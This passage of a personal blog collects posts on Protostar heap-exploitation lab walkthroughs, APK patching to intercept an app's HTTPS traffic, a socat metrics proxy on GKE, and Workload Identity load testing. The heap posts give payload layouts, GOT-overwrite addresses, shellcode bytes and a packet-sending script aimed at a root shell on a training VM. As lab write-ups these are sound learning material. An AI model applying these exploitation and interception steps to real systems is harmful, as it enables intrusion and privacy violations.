, the heap memory of the first
string should be FSRDAAAA...AAAA/BBBB
. Let’s confirm this with a Python script and gdb
. We’ll
set a breakpoint right after the call to check_path()
and send these two strings.
We save the following contents to a file named test.py
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|
I’m running the Protostar VM on Virtualbox on a Macbook. Set the network settings for the VM to
Host-only Adapter. Once the VM starts, use the Virtualbox “Show” button to get a terminal to the VM.
Login as user
with password user
. Run ip addr show
to find the VM’s local IP address. Mine is
192.168.99.107
. I then close the Virtualbox terminal because I like to use iTerm. I SSH with iTerm
into the VM as root with password godmode
. We need to be root in order to attach gdb to a running
process.
1
|
|
You can see final2 is already running. We get the PID.
1 2 |
|
Now attach gdb to it. Since the program forks a new child process to handle requests, we set follow-fork-mode child
to make gdb follow the child process instead of the parent. set detach-on-fork off
makes gdb hold control of both parent and child (I’m not sure if this is necessary). The other two gdb settings are my personal preferences.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
|
Disassemble get_requests()
to find where check_path()
returns.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Now run our Python script in another terminal to send the strings.
1
|
|
Our gdb terminal will show the following.
1 2 3 4 5 6 7 8 |
|
Print buf
to show the address it points to. Then examine the first 40 DWORDs in hexadecimal
starting at address 0x804e000
(0x804e008 - 0x8
so we can see the first heap chunk’s metadata in
the previous 8 bytes). We can see it starts with FSRD (0x44525346), is followed by lots of As (0x41s), and ends in /AAAA.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
We continue and examine the memory of the first chunk again. We expect the memory at address
0x804e084
to be BBBB
or 0x42424242
which it is.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
free()
With the ability to overwrite bytes following a strategically placed /
character in the previous
heap chunk, we can perform a classic heap overflow exploit using the unlink()
technique. We can’t
overwrite the first chunk’s heap metadata because there’s no way to insert a /
before it. So we
target the second chunk’s heap metadata. I’m now going to rehash some of the dlmalloc algorithm
explained in my previous post because it can be a little confusing.
When the first chunk is freed, unlink() will run on the second chunk if the second chunk has already been freed. dlmalloc determines if the second chunk is freed by checking the third chunk's PREV_INUSE bit, which is the lowest bit of the chunk's second DWORD (its size field). To find the start of the next chunk, dlmalloc adds a chunk's size (with the PREV_INUSE bit masked off) to that chunk's starting address. So in the above memory dump, the start of the second chunk is (0x00000089 & ~0x1) + 0x804e000 = 0x804e088. Likewise, the start of the third chunk is (0x00000089 & ~0x1) + 0x804e088 = 0x804e110. So we have to figure out a way to write arbitrary bytes to the third chunk.
But we're already writing arbitrary bytes to the second chunk's metadata. Is there a way to make dlmalloc think the third chunk starts somewhere in memory where we're already writing bytes for the second chunk? Nothing in dlmalloc checks that the third chunk is actually right after the second.
dlmalloc just blindly performs an addition on two numbers. One of these numbers is the second
chunk’s size which we can set via the memmove()
bug. Let’s make dlmalloc think the third chunk is
actually four bytes before the start of the second chunk. The second chunk is at 0x804e088
so the
“virtual” third chunk will be at 0x804e084
. What number added to 0x804e088
equals 0x804e084
?
-4. Integer overflow means adding 0xfffffffc is the same as adding -4 (0x804e088 + 0xfffffffc = 0x804e084 modulo 2^32). So the second chunk's second DWORD representing its size must be 0xfffffffc, and the PREV_INUSE bit of the "virtual" third chunk must be 0. Writing 0xfffffffc 0xfffffffc will work.
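A one-off Python check of that wraparound arithmetic on 32-bit addresses:

```python
second_chunk = 0x804e088
fake_size = 0xfffffffc                       # -4 as an unsigned 32-bit value
virtual_third = (second_chunk + fake_size) & 0xffffffff
print(hex(virtual_third))                    # 0x804e084, four bytes before the second chunk
```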
Once we fool dlmalloc into thinking the second chunk is already freed, dlmalloc will unlink()
it.
So we need to craft values for the second chunk’s forwards and backwards pointers such that
unlink()
will redirect code execution to another region of memory where we can insert shellcode.
In the Heap3 level we overwrote the global offset table (GOT) entry of a function with the address of shellcode. We can do the same here. Since we send two packets, dll will be 2. The for-loop will call write() twice. The first free() will overwrite write()'s GOT entry. Let's find the GOT address containing the address of write(). We disassemble get_requests and examine the address 0x8048dfc as an instruction to get the address in the global offset table (GOT) that points to the dynamically linked library containing the actual write() function. We want to overwrite the contents of 0x804d41c with the address of our shellcode. Since unlink() adds 12 to the forwards pointer, we need to make the forwards pointer 0x804d41c - 12.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Where should we put our shellcode? We can include it in our first request. The first two DWORDs will
be clobbered by dlmalloc when it sets the first chunk’s forwards and backwards pointers. The first
word needs to be used for FSRD
anyways. So let’s put shellcode at 0x804e010
. This address will
be our backwards pointer.
To summarize, this is how the packets should look so far.
The first payload must start with FSRD
. Then we need four bytes of filler bytes AAAA
followed by
shellcode (TBD). The last byte must be /
for memmove()
. The payload must be 128 bytes. The
spaces in the payload visualization below are just for readability. They shouldn’t be in the actual
payload.
1
|
|
The second payload must start with FSRDROOT
. Then have 0xfffffffc 0xfffffffc
. Then the forward
pointer 0x804d41c - 12
and backward pointer 0x804e010
. The whole payload must again be 128
bytes. We can just fill with A
s.
1
|
|
Before we craft shellcode, let’s confirm the exploit will redirect code execution to the proposed
shellcode address. Instead of using actual shellcode, we’ll use four bytes of 0xcc
which is a
one-byte x86 instruction called INT3
that causes the processor to halt the process for any
attached debuggers. If we hit this opcode, our attached gdb debugger receives the SIGTRAP
signal.
Let’s test with the below Python script.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
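For readers following along, here is an equivalent Python sketch of that test (not the original script). Each request is padded to exactly 128 bytes, the addresses are the ones derived above, 192.168.99.107 is my VM's Host-only Adapter IP, and the byte layout is my reconstruction of the payloads described above:

```python
import socket
import struct

REQSZ = 128
VM_IP = "192.168.99.107"                         # the VM's Host-only Adapter address

shellcode = b"\xcc" * 4                          # INT3 placeholder for the real shellcode

# First request: FSRD, four filler bytes, shellcode at what will be 0x804e010,
# padding, and a trailing "/" as the last byte for memmove() to find.
payload1 = b"FSRD" + b"AAAA" + shellcode
payload1 += b"A" * (REQSZ - len(payload1) - 1) + b"/"

# Second request: FSRDROOT, then a "/" so that everything after it gets memmove()'d
# over the second chunk's metadata: two fake 0xfffffffc size words, then FD and BK.
payload2 = (b"FSRDROOT" + b"/"
            + b"\xfc\xff\xff\xff" * 2            # fake prev_size/size of the second chunk
            + struct.pack("<I", 0x804d41c - 12)  # FD: write()'s GOT entry minus 12
            + struct.pack("<I", 0x804e010))      # BK: where the shellcode lives
payload2 += b"A" * (REQSZ - len(payload2))

s = socket.create_connection((VM_IP, 2993))
s.sendall(payload1)
s.sendall(payload2)
input("hit enter to send a short third packet and trigger the frees...")
s.sendall(b"FSRD")                               # fewer than 128 bytes breaks the loop
```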
Attach gdb to the final2
process again.
1 2 3 4 5 6 7 8 9 10 11 |
|
Set a breakpoint at the call to write()
.
1 2 3 4 |
|
Run the Python script in another terminal. Hit enter to send a third packet that’s less than 128
bytes to break out of the while(1)
loop.
1 2 3 |
|
The gdb session should hit the breakpoint at write()
.
1 2 3 4 5 6 7 8 |
|
Examine the first 80 DWORDs. Continue and examine again.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
|
Memory at 0x804e008
and 0x804e00c
have been changed (to addresses before the heap. I guess
because it’s some special value for the first chunk). Our INT3 instruction is at 0x804e010
. Let’s
look at the GOT entry for write()
.
1 2 3 4 5 |
|
Its value is the location of our INT3. This means the next call to write()
will redirect code
execution to our INT3 which should cause gdb to break again.
1 2 3 4 5 |
|
It worked!
So now all we have to do is insert some real shellcode that'll own the system. Since final2 is running as root, let's make the process start a shell. This will allow us to send arbitrary commands over TCP
that get executed as root, i.e. remote code execution. Shellstorm has a great library of
shellcodes. Let’s use “Linux/x86 - execve(/bin/sh) - 28 bytes”. But we have a
problem. unlink()
overwrites the memory at 0x804e018
(it’ll always overwrite four bytes of
memory eight bytes ahead of whatever address we pick), and no useful shellcode is short enough to
fit into eight bytes. What can we do?
If only the shellcode could jump past 0x804e018 to 0x804e01c, where we have a huge piece of
contiguous memory. Luckily the jmp
instruction (\xeb
) does exactly this. Its argument is how many
bytes to jump over. So our shellcode can start with 0xeb 0x0a
which moves the instruction pointer
10 bytes forward. We fill in the middle 10 bytes with nop
s (0x90
). Our final script will
be this.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
|
1 2 3 4 5 |
|
The basic principle is to proxy the traffic from the app through a computer you control on which you can capture and analyze traffic. If the app you’re interested in is using an unencrypted protocol like HTTP, this is pretty easy. Just run a proxy on your computer and configure your mobile device to proxy network traffic through your computer’s IP.
Most apps these days, however, use encrypted protocols like HTTPS (or are even required to by default by mobile OSes). Data at the TCP layer and below like IP addresses and port numbers are visible in plaintext, but all application level data at the HTTPS layer is encrypted. So you run a proxy that supports HTTPS on your computer, but then your app doesn’t trust the self-signed TLS certificate your computer presents. Mobile apps used to trust certificates that the mobile device’s system trusted. So you could just download the self-signed certificate onto the mobile device and configure the mobile OS to trust it. But these days mobile app frameworks let developers customize their app’s network security settings (like so for Android).
Let’s say your mobile app has custom trust anchors or pins certificates. What do you do now? You can either
I'm not familiar with how to do this on iOS (there seem to be good resources out there like this), so I'll show how to do option two on Android.
I don't have an Android phone, so I used an emulator called Genymotion. I created a Samsung Galaxy S9 virtual device, which has a recent enough Android OS to run most mobile apps. In order to install the mobile app from the Google Play Store I had to install OpenGApps. I think I could also have downloaded the APK from the web and dragged and dropped it into the emulator to install it.
To install the Charles cert, I had to open this page in Chrome. The built-in browser in the emulator didn't seem to prompt me to download the Charles cert, but Chrome did. I installed Chrome by installing OpenGApps and then installing Chrome from the Play Store. I think I also needed to configure the Android device to use Charles as its proxy with these steps in order to get the certificate download prompt. Then I made the Android device trust it.
I used apktool to decompile the APK.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
The app only allows cleartext to the above two domains. I don’t see any pinned certificates, but
there must be some defaults since the app didn’t trust the same certs trusted by the Android OS. So
I updated network_security_config.xml
to be the following.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Then I tried recompiling the patched APK but got the following error.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
This Github issue comment suggested I run that command with the --use-aapt2
switch.
Then I got another error.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
|
This PR fixes the above on Linux and Windows. As of this writing, it’s not released yet. So I had to build from source on an Ubuntu VM.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
I signed the patched APK. First I generated some keys. I’m not sure if certain signing and key algorithms are required, but these are the ones I used.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
|
Then when dragging and dropping the patched APK into the virtual device, I got an error saying the
app couldn’t be installed. In these cases, generating the logs and grepping through them for errors
like INSTALL_PARSE_FAILED_NO_CERTIFICATES
and INSTALL_FAILED_VERIFICATION_FAILURE
helps. I fixed
this last error by disabling USB verification in the virtual device
settings. The setting for this is inside the virtual Android device itself under “developer
settings.”
I made sure the traffic was proxied through my computer, the patched app started successfully, and I was able to see unencrypted data in Charles!
Many other resources already explain the exploit well, but I’m writing my own explanation to reinforce my understanding and to celebrate.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
|
The source code is pretty straightforward. There are the main() and winner() functions. There are three character pointers, three malloc()'s, three strcpy()'s, three free()'s, and finally a printf(). Our goal is to redirect code execution from main() to winner().
The description at the top of the level is
This level introduces the Doug Lea Malloc (dlmalloc) and how heap meta data can be modified to change program execution.
All these exercises are on 32-bit x86 architecture.
The vulnerable malloc is usually referred to as dlmalloc (named after one of its authors Doug Lea) and must be an old version like this one from 1996. The Phrack article “Once Upon a free()…” provides useful background.
Most malloc implementations share the behaviour of storing their own management information, such as lists of used or free blocks, sizes of memory blocks and other useful data within the heap space itself.
The central attack of exploiting malloc allocated buffer overflows is to modify this management information in a way that will allow arbitrary memory overwrites afterwards.
For our purposes, skip to the “GNU C Library implementation” section. It says that memory slices or
“chunks” created by malloc are organized like so. On 32-bit systems, prev_size
and size
are
4 bytes each. data
is the user data section. malloc()
returns a pointer to the address where
data
starts.
1 2 3 4 5 6 7 8 9 10 |
|
The other important things to know about the vulnerable version(s) of dlmalloc are:
- The lowest bit of size, called PREV_INUSE, indicates whether the previous chunk is used or not.
- When you free() the chunk using free(mem), the memory is released, and if its neighboring chunks aren't free, dlmalloc will clear the next chunk's PREV_INUSE and add the chunk to a doubly-linked list of other free chunks. It does this by adding a forward and backward pointer at mem.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
- dlmalloc uses a macro called unlink(), which removes an entry from a doubly-linked list and ties the loose ends of the list back together.
1 2 3 4 5 6 7 |
|
Written with pointer notation:
1 2 3 4 |
|
Since we can overwrite the bytes of P, we can overwrite 4 bytes of memory at two arbitrary places. To trigger this code path, the chunks being consolidated must be bigger than 80 bytes; dlmalloc classifies smaller chunks as "fastbins" and handles them differently.
An array of lists holding recently freed small chunks. Fastbins are not doubly linked.
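Before diving into gdb, here's a toy Python model of the two writes unlink() performs; the addresses below are made up, and a dict stands in for memory, one 32-bit word per address:

```python
# unlink(P) with FD = P->fd and BK = P->bk does:
#   FD->bk = BK   i.e.  *(FD + 12) = BK
#   BK->fd = FD   i.e.  *(BK + 8)  = FD
def unlink(mem, P):
    FD = mem[P + 8]
    BK = mem[P + 12]
    mem[FD + 12] = BK
    mem[BK + 8] = FD

# If we control the fd/bk words of the chunk being unlinked, we control both writes.
mem = {0x1008: 0xdeadbeef, 0x100c: 0xcafebabe}   # fake chunk at 0x1000 (made-up addresses)
unlink(mem, 0x1000)
assert mem[0xdeadbeef + 12] == 0xcafebabe
assert mem[0xcafebabe + 8] == 0xdeadbeef
```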
Run gdb on heap3.c
. My personal preference is to set the disassembly-flavor to intel and turn off
pagination.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
We first disassemble the main()
function.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
|
The printf has become a puts()
. plt
stands for procedure linkage table, one of the structures
which makes dynamic loading and linking easier to use. @plt
means we are calling puts
at PLT
entry at address 0x8048790
. If we disassemble that address we see
1 2 3 4 5 6 |
|
It calls another function at address 0x804b128
. This address is part of the Global Offset Table
(GOT) which points to the dynamically linked library containing the actual puts()
function.
1 2 |
|
We want to replace the call to puts()
with a call to winner()
. So we want to overwrite the
contents of 0x804b128
in the GOT, currently 0x08048796
, with the address to winner()
.
To get a visual sense of what the heap looks like, set breakpoints at every library function
call, i.e. break at the address of malloc()
, strcpy()
, free()
, and puts()
.
1 2 3 4 5 6 7 8 |
|
Run the program with some recognizable input strings.
1 2 3 4 5 6 |
|
We’ve hit the first breakpoint. Continue past it so that one malloc()
is called and the heap is
initialized.
1 2 3 4 5 |
|
Now look at the mapped memory regions.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
The heap starts at 0x804c000
, ends at 0x804d000
, and has size 0x1000
or 4096 bytes. We can
define hooks in gdb. We define one to examine the first 56 words of the heap in hexadecimal every
time execution stops.
1 2 3 4 5 |
|
If we continue, we hit the third malloc. At this point two malloc()
’s have been called.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
The second word of the chunk up to the last three bits indicates the chunk size in bytes. 0x29
is
0b101001
. Without the last three bits it’s 0b101000
which is 40. We can see the chunk starts at
0x804c000
and ends at 0x804c028
which is the start of the next chunk. This range encompasses
10 words. Each word is 4 bytes which makes 10 * 4 = 40 bytes. The last bit of the size word
indicates that the previous chunk is in use. By convention the first chunk has this bit turned on
because there’s no previous chunk that’s free.
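A quick Python check of that bit math:

```python
size_word = 0x29
print(bin(size_word))      # 0b101001
print(size_word & ~0x7)    # 40: the chunk size with the three flag bits cleared
print(size_word & 0x1)     # 1: PREV_INUSE, the previous chunk is in use
```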
The second chunk resulting from the second malloc()
starts at 0x804c028
and ends at 0x804c050
.
It’s identical to the first chunk. Continue past the third malloc()
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
We see a third chunk is created. The number at the end (right now 0x00000f89
) indicates the
remaining size of the heap. It has been decreasing. Continue past the first strcpy()
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
We see the 12 A's (ASCII value 0x41) have been written to the heap. Continue two more times past the remaining two strcpy()'s.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
|
We see the 12 B
’s and C
’s being written to their respective chunks. We are now at the first
free()
. Continue again.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
The first word of the third chunk’s data at 0x804c058
has been zeroed out. Continue.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
0x804c030
now has 0x0804c050
which is a pointer to the start of the third chunk. This shows the
second and third chunk are now tied together in a singly-linked list since they are small enough to
be considered fastbins. Continue.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
Now the first chunk has been freed and address 0x804c008
has a pointer 0x0804c028
to the second
chunk. If we continue, the program runs the printf("dynamite failed?\n");
line.
1 2 3 4 5 6 7 |
|
Let’s work backwards. We can use unlink()
to write the four byte address of a call to winner()
to the GOT
entry for puts()
. Use objdump
to find the address of winner()
.
1 2 |
|
We can’t just put 0x08048864
in the GOT entry at 0x804b128
(why?).
In order to call winner()
, we’ll need to craft a payload that does so. Such a
payload is often called “shellcode.” The following assembly code will do.
1 2 |
|
Using an online x86 assembler, the above in raw assembly is
\xB8\x64\x88\x04\x08\xFF\xD0
. We can store this in the heap’s first chunk whose data area starts
at 0x804c008
. Now we want to write 0x804c008
into the GOT entry for puts()
at 0x804b128
.
Let’s go back to the unlink statements.
1 2 3 4 |
|
BK
is the address of \xB8\x64\x88\x04\x08\xFF\xD0
. Where should we store that? Let’s put it in
the first chunk at 0x804c014
. The first chunk’s data starts at 0x804c008
, but we’ve seen the
first byte is changed by dlmalloc when it’s freed. We don’t want our shellcode to be changed so we
put it at a safe distance in the data at a +12-byte offset. 12 A
’s can pad the shellcode enough to
push it 12-bytes into the heap. We have enough info to construct the first command line argument.
1
|
|
We’ll store FD
and BK
in the third chunk. We can use the second command line argument to
overwrite the size of the third chunk to be greater than 80 to trigger the unlink()
macro when the
third chunk is free()
’d. The second argument needs to have enough characters to overflow its
chunk. The chunk’s data starts at 0x804c030
and ends 32 bytes later at 0x804c050
. The third
chunk’s size
is four bytes later at 0x804c054
. So we can use 32 + 4 = 36 characters as padding.
Let’s pick 100 as the size of the third chunk. 100 = 0x64. We also have to set the last bit to 1 to
indicate the second or previous chunk is in use. So the third chunk’s size should be 0x65
. So our
second argument can have 36 B
’s as padding followed by \x65
.
1
|
|
Now we craft the third and final argument. Its structure will be some padding + four bytes to be determined + a size + FD + BK.
The third chunk starts at 0x804c050. It used to end 40 bytes later at 0x804c078, but we overwrote its size to 0x65, or 100, so now it ends 100 bytes later at 0x804c0b4. We want to trigger unlink() on the third chunk when we free() it. We’ve already ensured it’s not a fastbin by setting its size to be greater than 80 bytes. The next condition is to make dlmalloc consolidate this chunk with either the chunk before or after it. Since we’re using the previous chunk, let’s fool dlmalloc into thinking the next chunk is free.
I know what you’re thinking: there’s no fourth chunk. That’s right, but we’ll make dlmalloc think there is. In order to check whether a chunk is free, dlmalloc looks at the PREV_INUSE bit of the next chunk. To find the next chunk, dlmalloc adds the size of the current chunk to the current chunk’s address. You can see this at line 3259.
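If memory serves, the statement at that line is essentially the following (treat the exact line-number correspondence as approximate):
```c
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
```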
inuse_bit_at_offset() is a macro defined at line 1410.
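It reads roughly as follows (quoted from memory of that malloc.c):
```c
#define inuse_bit_at_offset(p, s) \
  (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE)
```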
chunk_at_offset() is defined at line 1381.
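Again roughly:
```c
/* Treat the memory s bytes away from p as a chunk. No sanity checks. */
#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))
```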
So let’s write a small size at 0x804c0b8 to make dlmalloc think the fifth chunk is close by, so we don’t have to add too much padding to our third argument. A size like 0x20, say. We’d have to write it as \x20\x00\x00\x00 (little-endian). But we have a problem here: C treats \x00 as the end of a string, so strcpy() stops copying at that NUL and copies nothing after it. This means we cannot insert \x00 in the middle of any of our inputs.
But all is not lost. We want a small number for the fourth chunk’s size. What’s another way of arriving at a small number, at least in the way computers represent integers? In ordinary arithmetic, two non-negative integers only produce a small sum if they are both small. In modular (wrap-around) arithmetic, however, the sum of two large numbers can exceed the modulus, wrap around, and come out small.
Take a closer look at how chunk_at_offset() is defined. It sums two numbers with no sanity checks. So we can write a really big number with no NUL bytes, which strcpy() won’t stop on, and which will still make dlmalloc think the fifth chunk is close by. Even better, we can use the first word of the fourth chunk as the fifth chunk’s size. How can we make dlmalloc think the fifth chunk sits four bytes before the fourth chunk? We do this with 0xfffffffc, which is -4 in two’s complement for signed integers. So 0xfffffffc at 0x804c0b8 makes the fifth chunk’s size field land four bytes earlier, at 0x804c0b4. That word’s last bit must be 0 to indicate the fourth chunk is free, and we can simply use 0xfffffffc again there.
We want (FD + 12) to equal 0x804b128, so FD should be 0x804b128 - 12 = 0x804b11c. Above we decided to make BK 0x0804c014. We have:
92 C’s of padding, two 0xfffffffc words, FD, followed by BK.
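Putting it together (same Python 2 assumption; the 0xfffffffc words, FD, and BK are written little-endian):
```sh
ARG3=$(python -c 'print "C"*92 + "\xfc\xff\xff\xff"*2 + "\x1c\xb1\x04\x08" + "\x14\xc0\x04\x08"')
```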
With the same gdb session as above, run the program with the three arguments.
Let’s continue until we stop at the first free() call.
Examine the GOT entry for puts().
Continue and see that free(c) has overwritten its contents with the address of our shellcode!
Let the rest of the program run and see that winner() is called.
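In gdb that inspection might look like this (the x commands are mine; the final value is the one the text above predicts):
```
(gdb) x/wx 0x804b128      # GOT entry for puts() before free(c)
(gdb) continue
(gdb) x/wx 0x804b128      # now 0x0804c014, the address of our shellcode
```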
Now let’s run it without gdb.
Amazing.
gke-metadata-server runs as a K8s DaemonSet. It exposes metrics about itself in Prometheus text-based format. I want to have an external scraper make HTTP requests to periodically collect these metrics. Unfortunately, the Prometheus HTTP server only listens on the Container’s localhost interface. So how can we expose these metrics, i.e. make the HTTP endpoint available externally?
socat is awesome. Notice that the gke-metadata-server DaemonSet is configured with .spec.template.spec.hostNetwork: true. This means the HTTP server is also listening on the GKE node’s localhost interface.
We can run a separate workload on this cluster that uses socat to proxy HTTP requests to gke-metadata-server. socat stands for “socket cat” and is a multipurpose relay. It’s netcat on steroids and can relay many kinds of sockets, not just TCP and UDP.
This proxy is deployed as a DaemonSet to make it easy to have a one-to-one correspondence with each node-local gke-metadata-server Pod. The DaemonSet will also need .spec.template.spec.hostNetwork: true so that it can share the same network namespace.
Here’s the proxy DaemonSet YAML. I use the Docker image alpine/socat:1.7.3.4-r0, which is a tiny 3.61 MB. The arguments ["TCP-LISTEN:54899,reuseaddr,fork", "TCP:127.0.0.1:54898"] tell socat to forward traffic from 0.0.0.0:54899 to 127.0.0.1:54898, which is where the Prometheus metrics are. fork tells socat to
After establishing a connection, handles its channel in a child process and keeps the parent process attempting to produce more connections, either by listening or by connecting in a loop
— http://www.dest-unreach.org/socat/doc/socat.html#OPTION_FORK
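A minimal sketch of that DaemonSet (the name and labels are placeholders; the image, args, and hostNetwork setting are the ones described above):
```yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: gke-metadata-server-metrics-proxy   # placeholder name
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: gke-metadata-server-metrics-proxy
  template:
    metadata:
      labels:
        app: gke-metadata-server-metrics-proxy
    spec:
      hostNetwork: true
      containers:
        - name: socat
          image: alpine/socat:1.7.3.4-r0
          args: ["TCP-LISTEN:54899,reuseaddr,fork", "TCP:127.0.0.1:54898"]
```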
Apply the DaemonSet.
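Assuming the manifest above is saved as metrics-proxy.yaml:
```sh
kubectl apply -f metrics-proxy.yaml
```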
Now make an HTTP request to any GKE node IP at port 54899.
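For example (the /metrics path is an assumption; use whatever path gke-metadata-server actually serves its Prometheus metrics on):
```sh
curl http://<node-ip>:54899/metrics
```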
Voila. The important metrics are:
metadata_server_request_count
metadata_server_request_durations_bucket
I have these Prometheus recording rules to calculate RPS and request duration percentiles.
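A sketch of such rules (the rule names and 5m window are my own choices; the expressions assume the metrics follow standard Prometheus counter and histogram conventions):
```yaml
groups:
  - name: gke-metadata-server
    rules:
      # requests per second
      - record: gke_metadata_server:request_rps
        expr: sum(rate(metadata_server_request_count[5m]))
      # p99 request duration
      - record: gke_metadata_server:request_duration:p99
        expr: histogram_quantile(0.99, sum(rate(metadata_server_request_durations_bucket[5m])) by (le))
```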
Thanks to @mikedanese for the initial idea of using socat.
Before we knew about this low RPS failure threshold, we told many internal engineering teams to go ahead and use the feature. In hindsight, we should’ve load-tested the feature before making it generally available internally, especially since it wasn’t even GA publicly.
My efforts to load test WI have grown more sophisticated over time. This post describes the progression. It’s like the “4 Levels of …” Epicurious YouTube videos. The goal here is to find out at what RPS WI starts to fail and to try to learn some generalizable lessons from load testing vendor-managed services.
Workloads on GKE often need to access GCP resources like PubSub or CloudSQL. In order to do so, your workload needs to use a Google Service Account (GSA) key that is authorized to access those resources. So you end up creating keys for all your GSA’s and copy-pasting these keys into Kubernetes Secrets for your workloads. This is insecure and not maintainable if you are a company that has dozens of engineering teams and hundreds of workloads.
So GCP offered WI which allows a Kubernetes Service Account (KSA) to be associated with a GSA. If a workload can run with a certain KSA, it’ll transparently get the Google access token for the associated GSA. No manual copy-pasting GSA keys!
How does this work? You have to enable WI on your cluster and node pool. This creates a gke-metadata-server DaemonSet in the kube-system namespace. gke-metadata-server is the entrypoint to the whole WI system. Here’s a nice Google Cloud Next conference talk with more details.
gke-metadata-server is the only part of WI that is exposed to GKE users, i.e. runs on machines you control. It’s like the Verizon FiOS box in your basement. You control your house, but there’s a little box that Verizon owns and operates in there. All other parts of WI run on GCP infrastructure that you can’t see. When I saw failures with WI, it all seemed to happen in gke-metadata-server. So that’s what I’ll load test.
Here’s the gke-metadata-server DaemonSet YAML for reference. As of the time of this writing the image is gke.gcr.io/gke-metadata-server:20200218_1145_RC0. You might see different behavior with different images.
What kind of load am I putting on gke-metadata-server? Since this DaemonSet exists to give out Google access tokens, I’ll send it HTTP requests asking for such tokens.
I built a Docker image with the following Dockerfile.
Then I created the following K8s Deployment YAML.
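A rough sketch of what that Deployment does (the names, image reference, and exact shell loop are illustrative; the gcloud and tokeninfo calls match the description in the next paragraph):
```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: wi-load-test          # placeholder name
spec:
  replicas: 7
  selector:
    matchLabels:
      app: wi-load-test
  template:
    metadata:
      labels:
        app: wi-load-test
    spec:
      nodeSelector:
        kubernetes.io/hostname: <target-node>   # pin every Pod to one node
      containers:
        - name: load
          image: <image built from the Dockerfile above>
          command: ["/bin/sh", "-c"]
          args:
            - |
              while true; do
                TOKEN=$(gcloud auth print-access-token)
                curl -s "https://www.googleapis.com/oauth2/v3/tokeninfo?access_token=${TOKEN}" > /dev/null
              done
```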
I ran seven of these Pods on a single node (see the nodeSelector above) to target a single instance of gke-metadata-server.
This isn’t a great test because there’s a lot of extra work performed by the Container: running gcloud to print a Google access token (there may be bottlenecks in this gcloud command itself, which is Python code) and curling the googleapis.com endpoint to get the token info (originally done to verify the token was valid). There are probably also bottlenecks in using a shell to do this. All in all, this implementation doesn’t really let you specify a fixed RPS. You’re at the mercy of how fast your Container, shell, gcloud, and the network will let you execute this. I also wasn’t able to run more Pods on a single node because I was hitting the max of 32 pods per node. There were already a bunch of other GKE-system-level workloads like Calico that took up node capacity.
Apply this one Pod.
Then kubectl exec in and run this command.
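Something along these lines, with N controlling how many gcloud processes run concurrently (the exact invocation is my reconstruction):
```sh
seq 1 "$N" | xargs -P "$N" -I{} sh -c 'gcloud auth print-access-token > /dev/null'
```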
Everything seemed to work fine when N was 100. When N was 200 I got a few errors like the ones below. They look like client-side errors and not server ones though.
gcloud does not synchronize between concurrent invocations; it sometimes writes files to disk. So this is also not a great load test because it still doesn’t let you achieve a specific RPS and has client-side bottlenecks.
Use a proper HTTP load testing tool. A colleague told me about vegeta. It’s a seemingly good tool, but, more importantly, its commands are amazing: vegeta attack ....
I first start a golang Pod that just busy-waits.
Then I get a shell in it.
Let’s throw some load on WI! my-gsa@my-project.iam.gserviceaccount.com is the GSA associated with the KSA your workload runs as.
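An attack of roughly this shape (the target URL, header, rate, and duration are illustrative; with WI, the metadata token endpoint hands back a token for the GSA mapped to your KSA):
```sh
echo "GET http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token" \
  | vegeta attack -header "Metadata-Flavor: Google" -rate 100 -duration 60s \
  | vegeta report
```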
After more bisection, I found that this specific instance of gke-metadata-server starts to fail at around 150 RPS. When it does fail, p99 latency skyrockets from less than 1 second to 30 seconds. This is usually a sign of a rate limiter or quota.
How have you tried load testing WI or other GKE features? What’re your favorite load testing tools for these cases, and what interesting behavior have you found?
